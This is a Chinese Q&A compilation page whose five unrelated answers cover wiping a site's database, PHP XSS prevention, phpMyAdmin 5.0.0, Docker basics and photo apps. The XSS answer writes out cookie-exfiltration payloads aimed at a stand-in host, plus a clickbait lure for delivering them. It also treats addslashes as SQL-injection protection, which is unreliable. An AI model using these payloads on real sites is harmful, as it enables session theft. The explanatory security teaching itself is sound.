php怎么彻底清楚

1、php怎么彻底清楚，想关闭自己单位的网站？

你好，彻底关闭网站的话清理掉数据库就可以的了。

怎么打开数据库呢？

1）php源码的一般为sql数据库，到空间/服务器控制面板进入数据库后台，清理掉全部表格以及资料。（或者进入数据库控制面板清空数据库）

2）asp源码的一般为acc数据库，直接登录空间/服务器文件管理，把后缀名为.mdb的文件删除就可以了。

希望能够帮到你，谢谢。

2、PHP如何防止XSS攻击？

XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后，攻击者可能得到包括但不限于更高的权限（如执行一些操作）、私密网页内容、会话和cookie等各种内容。

HTML是一种超文本标记语言，通过将一些字符特殊地对待来区别文本和标记，例如，小于符号（<）被看作是HTML标签的开始，<title>与</title>之间的字符是页面的标题等等。当动态页面中插入的内容含有这些特殊字符（如<）时，用户浏览器会将其误认为是插入了HTML标签，当这些HTML标签引入了一段JavaScript脚本时，这些脚本程序就将会在用户浏览器中执行。所以，当这些特殊字符不能被动态页面检查或检查出现失误时，就将会产生XSS漏洞。

当然我会将标题设计的非常吸引人点击，比如 “陈冠希艳照又有流出2012版(20P无码)” ，这样如果我将里面的alert换成恶意代码，比如：

location.href='http://www.xss.com?cookie='+document.cookie’；或者<a href='http://www.xss.com?cookie='+document.cookie>。用户的cookie我也拿到了，如果服务端session没有设置过期的话，我以后甚至拿这个cookie而不需用户名密码，就可以以这个用户的身份登录成功了。

预防XSS攻击

从根本上说，解决办法是消除网站的XSS漏洞，这就需要网站开发者运用转义安全字符等手段，始终把安全放在心上。

简单点，就是过滤从表单提交来的数据，使用php过滤函数就可以达到很好的目的。

htmlspecialchars() 函数

代码实例：

<?php

if (isset($_POST['name'])){

$str = trim($_POST['name']); //清理空格

$str = strip_tags($str); //过滤html标签

$str = htmlspecialchars($str); //将字符内容转化为html实体

$str = addslashes($str); //防止SQL注入

echo $str;

}

?>

<form method="post" action="">

<input name="name" type="text">

<input type="submit" value="提交" >

</form>

具体操作无法一一写出，需要你边实践边摸索

3、phpMyAdmin？

phpMyAdmin 5.0.0版本于今天正式发布。该版本同4.9.3版本同时存在，不过官方推荐没有安装旧版PHP的用户尽量使用5.0.0版本。本次5.0版本更新中在涵盖了4.9分支的大量改进之外，还引入了诸多新功能。

团队表示也希望为那些运行旧版PHP的用户尽量维护phpMyAdmin 4分支，有关受支持的版本和寿命终止日期的完整详细信息，请参阅https://www.phpmyadmin.net/downloads/上的“受支持的版本”一栏。phpMyAdmin 5.0.0版本移除了对旧版PHP版本（5.5、5.6、7.0和HHVM）的支持，这些旧版本已经不再得到PHP团队的支持。

phpMyAdmin 5.0.0版本对用户界面进行了诸多现代化改进，在更加透明的同时让代码维护变得更加轻松。改进的部分功能包括：

● 默认情况下启用CSV导出的列名称

● 添加Metro主题

● 创建自动递增列时自动添加索引

● 改进了导出视图

● 在没有WHERE子句的UPDATE查询之前，提示用户进行确认

● 改进了向用户显示错误的方式（包括允许更轻松地将错误文本复制到剪贴板）

● 添加了击键以清除行（ctrl + l）并清除整个控制台窗口（ctrl + u）

● 导出格式为MS Excel时使用字符集“ windows-1252”

已知的问题

由于MySQL对身份验证方法的更改，7.4之前的PHP版本无法向MySQL 8.0或更高版本的服务器进行身份验证（我们的测试表明，问题实际上始于MySQL 8.0.11）。这与PHP错误https://bugs.php.net/bug.php?id=76243有关。

临时解决方法就是，将您的用户帐户设置mysql_native_password为使用当前样式的密码哈希方式。不幸的是，这种缺乏协调的行为导致了所有PHP应用程序的不兼容性，受影响的不仅仅是phpMyAdmin。有关更多详细信息，您可以在https://github.com/phpmyadmin/phpmyadmin/issues/14220上查看我们的错误跟踪器项。

用户可以通过https://phpmyadmin.net/downloads/下载。

4、小白docker求入门？

本文邀请yeedom来解答，通过大量的图片、示例介绍，帮助你快速、全面地从入门到实战~

Docker使用go基于linux lxc（linux containers）技术实现的开源容器，诞生于2013年年初，最开始叫dotcloud公司，13年年底改名为docker inc。

2017年下载次数达到了百亿次，估值达13亿美元，通过对应用封装（Packaging）、分发（Distribution）、部署（Deployment）、运行（Runtime）全生命周期管理，达到“一次封装，到处运行”

为何使用docker？

Docker直译码头工人，将各种大小和形状的物品装进船里。这对从事软件行业的人来说，听起来很熟悉，花了大量时间和精力把一个应用放在另一个应用里。

docker出现之前，对不同环境的安装、配置、维护工作量很多，如部署，配置文件，crontab，依赖等等。使用docker，无需关心环境，只需要一些配置就能构建镜像，而部署则用一条run命令。

虚拟机VS容器

虚拟机需要有额外的虚拟机管理应用和虚拟机操作系统层，操作系统层不仅占用空间而且运行速度也相对慢。docker容器是在本机操作系统层面上实现虚拟化，因此很轻量，速度接近原生系统速度。

虚拟机启动速度是分钟级别，性能较弱、内存和硬盘占用大，一个物理机最多跑几十个虚拟机，但它的隔离性比较好。docker启停都是秒级实现，内存和硬盘占用非常小，单机支持上千个容器，在ibm服务器上可运行上万个容器。容器跟虚机相比，有着巨大的优势。

docker优点

只关心应用：以往我们需要关心操作系统、软件、项目，有了docker我们可以只关心应用而不是操作系统，docker发展迅速，基于docker的paas平台也层出不穷，使得我们能更方便的使用docker；

快速交付：docker可在秒级提供沙箱环境，开发，测试，运维使用完全相同的环境来部署代码

微服务：docker有助于将一个复杂系统分解，让用户用更离散的方式思考服务

离线开发：将服务编排在笔记本中移动办公，使用docker可在本机秒级别启动一个本地开发环境；

降低调试成本：在测试和上线时产生无效的类、有问题的依赖、缺少的配置等问题，docker可让一个问题调试和环境重现变得更简单；

CD：docker让持续交付实现变得更容易，特别是对于蓝绿部署就更简单。

第一版上线时，需要上第二版新功能，两个版本功能会有冲突，这时用docker实现蓝绿部署就非常方便了；

如：可以部署两个版本同时在线，新版本测试没问题了把老版本流量切到新版本就可以了

迁移：可以很快的迁移到其他云或服务器

与传统虚拟机方式相比，容器化方式在很多场景下都是存在极为明显的优势。无论是开发、测试、运维都应该尽快掌握docker，尽早享受其带来的巨大便利；

容器化方式在很多场景下都有极大的优势。无论是开发、测试、运维都应该尽快掌握docker，尽早享受其带来的巨大便利。

概念

再来了解docker非常关键的概念，这样才能理解docker容器整个生命周期。

概念-镜像

镜像（类）=文件系统+数据，我常常用开发语言中的类比作镜像，对象比作容器镜像由多个层加上一些docker元数据组成，容器运行着由镜像定义的系统。

概念-容器

容器（对象）=镜像运行实例

容器是镜像的运行实例，可以使用同一个镜像运行多个实例。如图所示，一个ubuntu docker镜像产生了三个ubuntu容器，docker利用容器运行和隔离应用。

从读写角度来说，镜像是只读的，容器是在镜像上添加了一层可读写的文件系统。

概念-层

层=文件变更集合

像传统虚机应用，每个应用都需要拷贝一份文件副本，运行成百上千上磁盘空间会迅速耗光，而docker采用写时复制来减少磁盘空间，当一个运行中的容器要写入一个文件时，它会把该文件复制到新区域来记录这次的修改，在执行docker提交时将这次修改记录下并产生一个新的层。docker分层解决大规模使用容器时碰到的磁盘和效率问题。

概念-仓库

docker借鉴了大量git优秀的经验。docker仓库分公有库和私有库，最大的公开仓库是docker hub，国内也有很多仓库源。

通过创建一个docker应用来看看docker是怎么方便使用的。

创建docker镜像方式

创建docker有四种方式

但最常用的docker命令+手工提交和Dockerfile的方式

对于我们来说Dockerfile是最常用也是最有用的。

那创建一个docker应用只需要三步：编写dockerfile、构建镜像、运行容器

编写dockerfile

那我们就开始用dockerfile来创建一个应用

Dockerfile是包含一系列命令的文本文件，这个文件包含6条命令

1、FROM是使用php官方镜像，左边是镜像名字，右边是标签名字，标签名字不写默认是latest

2、声明维护人员

3、RUN运行一条linux命令，我们把php代码重定向到/tmp/index.php

4、EXPOSE声明要开放的端口

5、WORKDIR启动容器后默认目录

6、CMD容器启动后，默认执行的命令，相当于应用的入口，用php自带的webserver监听8000

构建镜像

使用docker build命令生成镜像，—tag指定镜像的名字，左边是名字，右边是标签，最后有个.表示在当前目录查找Dockerfile。可以看到，每个命令都会有个输入输出，输入是命令，输出是给到层的id，所以，基本上每个命令都会产生一个层。最后提示镜像构建成功，并打上镜像标签。

运行容器

第三，使用docker run命令运行镜像，-p将容器的8000端口映射到本机8000端口，—name给容器起个名字。用curl对本机8000端口请求，服务器返回当前时间，说明我们构建的容器运行成功了。

请求本地8000端口，服务器返回当前时间

dockerfile常用命令

其实Dockerfile常用命令就5个：from、add、run、workdir、cmd

创建docker应用步骤

•编写dockerfile

•构建镜像

•运行容器

使用docker应用步骤

•拉取镜像

•运行容器

dockerfile最佳实践

•精简镜像用途

尽量让每个镜像的用途单一

•选择合适基础镜像

选择以alpine、busybox等基础的镜像

busybox：号称操作系统里的瑞士军刀，只有……这么大，但却有一百多常用命令

如果你的目标是小而精，busybox是首选，因为它已经精简到没有bash，使用的是ash，一个兼容posix的shell

Alpine：你的目标是小但是又有一些工具的话，可以选择alpine，它是一个面向安全的轻量linux发行版，它关注安全、性能和资源效能，比busybox功能更完善，还提供apk查询和安装软件包，大小只有2-3兆。

很多官方的镜像都有alpine的镜像，像刚刚使用的php镜像。

•提供维护者信息

•正确使用版本

使用明确的版本号，而非依赖于默认的latest，避免环境不一致导致的问题

•删除临时文件

如安装软件后的安装包，如上图2、3步骤

•提高生成速度

如内容不变的指令尽量放在前面，这样可以复用

•减少镜像层数

多条命令写在一起，使生成的镜像层数少，如上图2、3步骤

•恰当使用multi-stage

保证最终生成镜像最小化

想使用一个镜像，用这个命令就可以了，默认按评分排序。official如果是ok表示是官方镜，Auto标示它是否用dickerfile进行自动化镜像构建。

pull

一旦确定一个镜像，通过对其名称执行docker pull来下载。标签默认是latest，严格来讲，镜像的仓库名还应该添加仓库地址的，默认是registry.hub.docker.com Docker images命令查找下载的镜像。

run

使用docker run运行一个容器，it表示用交互式方式运行，最后表示要执行的命令。

其实更常用的方式是以后台方式来执行，这时用d参数在后台运行，运行后用exec命令进去到容器。

tag

Docker tag给镜像一个新tag名字。

Docker images查看centos镜像，把centos:latest打上centos:yeedomliu，这时再看会有3个centos，latest和yeedomliu的镜像id是相同的。把centos:yeedomliu删除，再查看latest还会存在，最后用rmi命令删除latest就会真正把latest镜像删除掉。如果相同镜像存在多个标签，只有最后一次的rmi命令会真正删除镜像。

ps

Ps可以查看运行中的容器

rmi

删除一个镜像，同一个镜像id的不同标签的镜像，使用rmi删除最后一个镜像才会真正删除这个镜像。

rm

删除docker容器，如果运行中的容器需要加-f

diff

容器启动后文件变化情况

logs

查看容器运行后的日志

cp

我们想从容器里面拷贝文件到宿主机，或相反的过程就可以用到cp命令

container prune

随着使用docker时间越长，停止状态下的容器会越来越多，这些都会占据磁盘空间

image prune

未被打标签的镜像可以用image prune命令清理

system prune/df

如果你觉得刚刚两条命令执行起来麻烦，可以用docker system prune一条命令搞定

另外用system df查看docker磁盘空间

了解了docker基础知识后，可进入相对实战的环节

•本地开发

我们的项目使用了很多服务，如redis/mysql/mongodb等等，如果一个个运行起来，还加上配置，容易出手，也比较麻烦

kitematic：与使用命令行管理本地容器相比，你更想使用图形工具对容器管理，官方推出的容器管理工具，通过它可以查找镜像、创建容器、配置、启停容器等管理。

这是配置容器端口和宿主机端口，目录，网络等映射界面

docker-compose

compose定位是“定义和运行多个docker容器的应用”，前身fig，目前仍然兼容fig格式的模板文件。

一条命令可以把一个复杂的应用启动起来

日常工作中，经常碰到多个容器相互完成某项任务

docker-compose示例1

默认模板文件名叫docker-

compose.yml

docker-compose示例2

如果在本地开发，每个项目都可以像之前说的那样配置，这里提供了另外一种做法。我把公共的资源在一开始就启动，每个项目里只启动nginx镜像并关联其它的服务即可。

公共服务compose

项目compose

•常见问题

主进程：docker启动第一个进程称主进程，就是id为1的进程，这个进程退出就意味着容器退出，所以想要使docker作为服务使用，这个进程是不能退出的。expose命令是声明暴露的端口，运行时用-P才会生效。一般ports命令是做真正的端口映射，比较常用。

•架构

安装了docker的主机，一般在一个私有网络上

1、调用docker客户端可以从守护进程获取信息或发送指令

2、docker守护进程使用http协议接收来自docker客户端的请求

3、私有docker注册中心存储docker镜像

4、docker hub是由docker公司运营的最大的公共注册中心

互联网上也存在其他公共的注册中心

调用 Docker客户端可以从守护进程获取信息或给它发送指令。守护进程是一个服务器，它使用 HTTP协议接收来自客户端的请求并返回响应。相应地，它会向其他服务发起请求来发送和接收镜像，使用的同样是 HTTP协议。该服务器将接收来自命令行客户端或被授权连接的任何人的请求。守护进程还负责在幕后处理用户的镜像和容器，而客户端充当的是用户与 REST风格 API之间的媒介。

理解这张图的关键在于，当用户在自己的机器上运行 Docker时，与其进行交互的可能是自己机器上的另一个进程，或者甚至是运行在内部网络或互联网上的服务。

•优化

使用小镜像：一般来说，使用小的镜像都相对比较优秀，如官方的镜像基本上都有基于alpine的镜像

事后清理：删除镜像里软件包或一些临时文件，减小镜像大小

命令写一行：多个命令尽量写在一起有助于减少层数，也会减少镜像的大小

脚本安装：使用脚本进行初始化时，可以有效减少dockerfile的命令，同时带来另外的问题，可读性不好并且构建镜像时缓存不了

扁平化镜像：构建镜像过程中，可能会涉及到一些敏感信息，或者用了上面的办法镜像依然很大，可以试试这个办法

docker export 容器名或容器id | docker import 镜像标签

multi-stage：从docker 17.05版本开始，docker支持multi-stage（多阶段构建），特别适合编译型语言，如我在一个镜像下编译，在另外一个很小的系统运行，如下图，go项目在golang环境下编译，在alpine环境下运行。

5、推荐几款好用的可以快速修图的手机修图APP？

Hi，我是阿詹，良心分享几个摄影后期修图的手机APP，简直强大到不行，堪称修图神器！文末给大家送波资源！

一、Snapseed

应该是摄影爱好者必备的修图软件了，完全免费，没有任何广告，29种工具和滤镜，包括修复、画笔、结构、HDR等等功能，可以通过精确的微调整，让你的照片显得更加有质感，不过需要学习，网上有很多的教程，这个APP，建议首选，学会了那真的是强大。

二、泼辣修图

无论你是入门新手还是摄影专家，这个APP应该都能满足你，对于后期修图，这个APP还是非常强大的，自定义图层和混合模式，双重曝光特效，还有丰富的滤镜可以用，最重要的是，它貌似还有电脑版的，这样就很方便了，用它做后期修图也不错！

三、Photoshop Express

PS大家应该在熟悉不过了，后期修图肯定少不了它，其实它一直有APP，功能也强大，可以同步作品至云端，然后在电脑端就可以查看后期摄影作品了，这个也是我常用的APP，滤镜、图层、混合模式这些功能都有，就不过多介绍了，它的名气不是我两句话能介绍完的！

四、Lightroom

这个主要是针对调色的，如果觉得自己的摄影作品色彩不够好，那么通过这个APP可以完美的调色，貌似很多设计师调色都用的它，也推荐给你们！

五、Enlight Photofox

Enlight系列的APP都非常的精致，这个也是一个修图的APP，有点类似手机版的ps，功能强大，像双重曝光，星空替换，小人特效，用这个APP都能做出来，唯一缺点就是高级功能收费，不过也不要紧，去某宝看一下，就会发现惊喜，如果是小白的话，可以直接用它的滤镜，这样做出来的照片也非常的精美。

以上就是今天分享给大家的5个后期修图APP，最后送波资源，大家可以私信回复：资源，可以免费获取一些教程、软件、资料等，我是阿詹，每天晚上给大家分享优质的软件资源！